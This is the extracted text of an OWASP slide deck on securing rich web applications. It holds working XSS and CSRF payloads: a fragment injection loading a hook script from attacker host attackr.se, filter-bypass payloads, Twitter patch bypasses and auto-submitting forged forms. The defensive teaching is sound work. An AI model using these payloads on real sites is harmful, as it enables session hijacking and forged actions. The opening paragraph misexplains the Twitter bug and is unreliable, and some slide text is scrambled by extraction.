This code is parsing the URL fragment identifier (everything after #!) and setting the window.location to that value, effectively redirecting the page. So if the URL was something like "https://twitter.com/#!/johnwilander#malicious_script", it would redirect to "https://twitter.com/malicious_script", executing the malicious script in the context of twitter.com

Application Security
for RIAs
John Wilander, & OWASP

Wednesday, November 2, 2011

Frontend developer at
Svenska Handelsbanken

Researcher in application security
Co-leader OWASP Sweden

@johnwilander
johnwilander.com (music)

OWASP == The Open Web
Application Security Project
Cheat sheets, tools, code, guidelines
https://owasp.org

ÅåÄäÖö


OWASP Top 10
Top web application
security risks 2010


1. Injection
2. Cross-Site Scripting (XSS)
3. Broken Authentication and Session
Management
4. Insecure Direct Object References
5. Cross-Site Request Forgery (CSRF)
6. Security Misconﬁguration
7. Insecure Cryptographic Storage
8. Failure to Restrict URL Access
9. Insufﬁcient Transport Layer Protection
10. Unvalidated Redirects and Forwards


”Do I have to care?”


Likelihood of ≥ 1 vulnerability on your site

From: WhiteHat Website Security Statistic Report, Winter 2011

Per extension

.asp .aspx .do .jsp .php

Sites having had ≥ 1
74 % 73 % 77 % 80 % 80 %
serious vulnerability

Sites currently having ≥ 1
57 % 58 % 56 % 59 % 63 %
serious vulnerability

From: WhiteHat Website Security Statistic Report, Spring 2010

But we’re moving
towards more
code client-side


Client-Side, JavaScript
Vulnerabilities

From: IBM X-Force 2011 Mid-Year Trend and Risk Report

Focus Today

• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
• Clickjacking
• Man-In-the-Middle SSL


XSS ...
the hack that keeps on hacking


Cross-Site Scripting
Theory

Scripting

ite
ross-S
C


Type 1, reﬂected

Scripting

Cross-Site
Ph
isin
g


Type 2, stored

s-Si te
C ros


Type 2, stored

Scripting


Type 0, DOM-based

ng
i pti
Scr
Cros
s-Sit
e

Ph
isin
g


Type 0, DOM-based

ng
i pti
Scr
Cros
No server roundtrip!
s-Sit
e

Also, single-page interfaces
make injected scripts ”stick”
Ph
isi
in thenDOM.
g


https://secure.bank.com/
authentication#language=sv&country=SE


https://secure.bank.com/
authentication#language=sv&country=SE
Never sent to server

Be careful when you use
this data on your page


Would you click this?

https://secure.bank.com/authentication
#language=<script src="http://attackr.se:
3000/hook.js"></script>&country=SE



https://secure.bank.com/authentication
#language=%3Cscript%20src%3D%22http%3A%2F
%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C
%2Fscript%3E&country=SE



http://bit.ly/Yg4T32


Filter out <script>?
var ... ,
stripScriptsRe = /(?:<script.*?>)((n|r|.)*?)(?:</script>)/ig,

/**
* Strips all script tags
* @param {Object} value The text from which to strip script tags
* @return {String} The stripped text
*/
stripScripts : function(v) {
return !v ? v : String(v).replace(stripScriptsRe, "");
},

http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts


Filter out <script>?
<img src=1 onerror=alert(1)>

<svg onload="javascript:alert(1)"
xmlns="http://www.w3.org/2000/svg"></svg>

<body onload=alert('XSS')>

<table background="javascript:alert('XSS')">

¼script¾alert(¢XSS¢)¼/script¾

<video poster=javascript:alert(1)//


”C’mon, such attacks
don’t really work,
do they?”

Yep, demo.


DOM-Based XSS
Twitter September 2010

Full story at
http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-ﬁx-and-something.html


(function(g){
var a = location.href.split("#!")[1];
if(a) {
g.location = a;
}
})(window);


(function(g){
What does this code do?
if(a) {
g.location = a;
}
})(window);


”https://twitter.com/#!/
johnwilander”.split(”#!”)[1]
returns
”/johnwilander”

(function(g){
if(a) {
g.location = a;
}
})(window);


returns
”/johnwilander”

(function(g){
window.location =
”/johnwilander”
if(a) { ’/’ => keeps the domain but
initial
g.location = a;
changes the path
}
})(window);


returns
”/johnwilander”

(function(g){
window.location =
”/johnwilander”
if(a) { ’/’ => keeps the domain but
initial
g.location = a;
changes the path
}
So
})(window);
twitter.com/#!/johnwilander
becomes
twitter.com/johnwilander

Read more: http://kotowicz.net/absolute/

http://twitter.com/
#!javascript:alert(document.domain);


http://twitter.com/
#!javascript:alert(document.domain);

Never sent to server
=> DOM-based XSS


The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}


The Patch™
var c = location.href.split("#!")[1];
if (c) {
window.location = c.replace(":", "");
} else {
return true;
}
Replaces the ﬁrst occurance
of the search string


http://twitter.com/
#!javascript::alert(document.domain);


The 2nd Patch™
(function(g){
if(a) {
g.location = a.replace(/:/gi,"");
}
})(window);


(function(g){
if(a) {
}
})(window); Regexp pattern
delimiters


(function(g){
if(a) {
}
delimiters

Global match


(function(g){
if(a) {
}
delimiters

Global match Ignore case


Were they done now?


http://twitter.com
#!javascript&x58;alert(1)


http://twitter.com
#!javascript&x58;alert(1)

HTML entity version of ’:’


The n:th Patch™
(this one works)

(function(g){
if(a) {
g.location.pathname = a;
}
})(window);

And hey, Twitter is doing the right thing: https://twitter.com/about/security

Fix these issues properly with ...
Client-Side Encoding


https://github.com/chrisisbeef/jquery-encoder
• $.encoder.canonicalize()
Throws Error for double encoding or multiple encoding
types, otherwise transforms %3CB%3E to <b>
• $.encoder.encodeForCSS()
Encodes for safe usage in style attribute and style()
• $.encoder.encodeForHTML()
Encodes for safe usage in innerHTML and html()
• $.encoder.encodeForHTMLAttribute()
Encodes for safe usage in HTML attributes
• $.encoder.encodeForJavaScript()
Encodes for safe usage in event handlers etc
• $.encoder.encodeForURL()
Encodes for safe usage in href etc

Let’s do a short demo
of that


Also, check out ...

Content Security Policy
http://people.mozilla.com/~bsterne/
content-security-policy/


New HTTP Response
Header Saying ...

Only allow scripts from whitelisted domains
and
only allow scripts from ﬁles, i.e. no inline scripts


'self' = same URL, protocol and port

X-Content-Security-Policy: default-src 'self'
Accept all content including scripts only from my own URL+port

X-Content-Security-Policy: default-src *;
script-src trustedscripts.foo.com
Accept media only from my URL+port (images, stylesheets,
fonts, ...) and scripts only from trustedscripts.foo.com


CSRF
my current favorite!


Cross-Site Request
Forgery
Request For
gery

Cro
ss-S
ite


Cross-Site Request
Forgery
Request Forgery

Cros
s-Site
Ph
isin
g


Is www.attackr.se allowed to
load images like this:

<img src=”https://secure.bank.com/
logo.png" />

?


Is www.attackr.se allowed to
load images like this:

authentication#language=sv&country=SE" />

?


With image tags www.attackr.se can silently
send HTTP GET requests to any domain

authentication#language=sv&country=SE"
height=0 width=0 />


”Will restricting to
HTTP POST save me?”


What’s on your mind? What’s on your mind?
POST POST


I love OWASP! POST POST


I love OWASP! POST POST

John: I love OWASP!


POST I hate OWASP! POST


POST I hate OWASP! POST

John: I hate OWASP!


POST <form id="target" method="POST"
action="https://1-liner.org/form">
John: I hate OWASP! <input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
</form>

<script type="text/javascript">
$(document).ready(function() {
$('#form').submit();
});
</script>


<form id="target" method="POST"
action="https://1-liner.org/form">
<input type="text" value="I hate
OWASP!" name="oneLiner"/>
<input type="submit"
value="POST"/>
POST
</form>
John: I hate OWASP!

<script>
$(document).ready(function() {
$('#target').submit();
});
</script>


There used to be a
protection in web 1.5


Forced Browsing
wizard-style

Shipment info ✉ Payment info $

Next Buy!


Forced Browsing
wizard-style

Shipment info ✉ Payment info $

Token

Next Buy!


Forced Browsing
wizard-style

Token 1 Token 2 Token 3


Forced Browsing
wizard-style


State built up i steps, server roundtrip in-between


Forced Browsing
wizard-style


ge
for
n’t to
uld est
Co qu
re t step
las out a
w tith oken
va lid

But in RIAs ...


RIA & client-side state

{
”purchase”: {}
}



{
”purchase”: {
”items”: [{}]
}
}



{
”purchase”: {
”items”: [{},{}]
}
}



{
”purchase”: {
”items”: [{},{}],
”shipment”: {}
}
}



{
”purchase”: {
”items”: [{},{}],
”shipment”: {},
”payment”: {}
}
}


Can an attacker forge
such a JSON structure?


CSRF possible?
{
”purchase”: {
”items”: [{},{}],
”shipment”: {},
”payment”: {}
}
}


action="https://vulnerable.1-liner.org:
8444/ws/oneliners">

<input type="text"
name=””
value="" />

<input type="submit" value="Go" />

</form>

8444/ws/oneliners"
style="visibility:hidden">

<input type="text"
name=””
value="" />


</form>

8444/ws/oneliners"
style="visibility:hidden"
enctype="text/plain">

<input type="text"
name=””
value="" />


</form>

8444/ws/oneliners"
Forms produce a request body that
<input type="text" like this:
looks
name=””
value="" /> theName=theValue

... and that’s not valid JSON.


</form>

8444/ws/oneliners"

<input type="text"
name='{"id": 0, "nickName": "John",
"oneLiner": "I hate OWASP!",
"timestamp": "20111006"}//'
value="dummy" />


</form>

8444/ws/oneliners"
Produces a request body that looks
like this:
<input type="text"
{"id": 0, "nickName":
name='{"id": 0, "nickName": "John",
"John","oneLiner": "I
"oneLiner": "I hate OWASP!",
hate OWASP!","timestamp":
"timestamp": "20111006"}//'
"20111006"}//=dummy
value="dummy" />
... and that is acceptable JSON!

</form>

Demo POST CSRF
against REST service


Demo XSS + CSRF with

The Browser Exploitation Framework
http://beefproject.com/


Important in your
REST API
• Restrict HTTP method, e.g. POST
Easier to do CSRF with GET

• Restrict to AJAX if applicable
X-Requested-With:XMLHttpRequest
Cross-domain AJAX prohibited by default

• Restrict media type(s), e.g. application/json
HTML forms only allow URL encoded, multi-part
and text/plain


Attacker may spoof
headers via Flash proxy

http://lists.webappsec.org/pipermail/
websecurity_lists.webappsec.org/2011-
February/007533.html


Double Submit


Double Submit
(CSRF protection)

Anti-CSRF value
as cookie ...

... and
request parameter


Double Submit
(CSRF protection)

cookie ≠
request parameter

Cannot read the
anti-CSRF cookie to
include it as parameter

Double Submit
(CSRF protection)

Anti-CSRF cookie can
be generated client-side
=> no server-side state


How To Get It Right
• Join your local OWASP chapter
https://www.owasp.org/index.php/OWASP_Chapter

• Start following these fellas on Twitter:
@WisecWisec @0x6D6172696F @garethheyes
@internot_ @securityninja @jeremiahg
@kkotowicz @webtonull @manicode @_mwc

• Start hacking – it’s fun!
Best place to start? Your own apps of course.
Just stay legal ;)


@johnwilander
john.wilander@owasp.org
http://appsandsecurity.blogspot.com


Clickjacking and MItM
if there’s time


Clickjacking Demo


X-Frame-Options
http://blogs.msdn.com/b/ie/archive/
2009/01/27/ie8-security-part-vii-
clickjacking-defenses.aspx
http://tools.ietf.org/html/draft-
gondrom-frame-options-01


No page can load me in an iframe
or
only my own domain can load me in an iframe


X-Frame-Options: DENY

X-Frame-Options: SAMEORIGIN

(Coming:
X-Frame-Options: ALLOW-FROM [list])


MItM Demo


Moxie’s SSL Strip
http https

Terminates SSL Normal https
to the server
Changes https
to http Acts as client


Moxie’s SSL Strip
http https

Secure cookie?
Encoding, gzip?
Cached content?
Ongoing sessions?


Moxie’s SSL Strip
http https

Secure cookie? Strip secure attribute off all cookies
Encoding, gzip? Strip off all request encodings
Cached content? Strip off all if-modiﬁed-since in request
Ongoing sessions? 302 back to same page, set-cookie expired


SSL Strip & Tor
login.yahoo.com 114
Gmail 50
Tor node
Hotmail 13
PayPal 9

Tor node
In 24 h

Tor exit node with SSL Strip

e Wednesday, November 2, 2011

HTTP Strict Transport
Security
http://tools.ietf.org/html/draft-
ietf-websec-strict-transport-sec-02


Require SSL without warnings for X seconds ahead
and
potentially do the same for my subdomains too


Strict-Transport-Security: max-age=86400

Strict-Transport-Security: max-age=86400;
includeSubdomains


W3C Web Application Security Working Group
http://www.w3.org/2011/webappsec/


Recommended

Recommended

More Related Content

More from Sencha

More from Sencha (20)

Recently uploaded

Recently uploaded (20)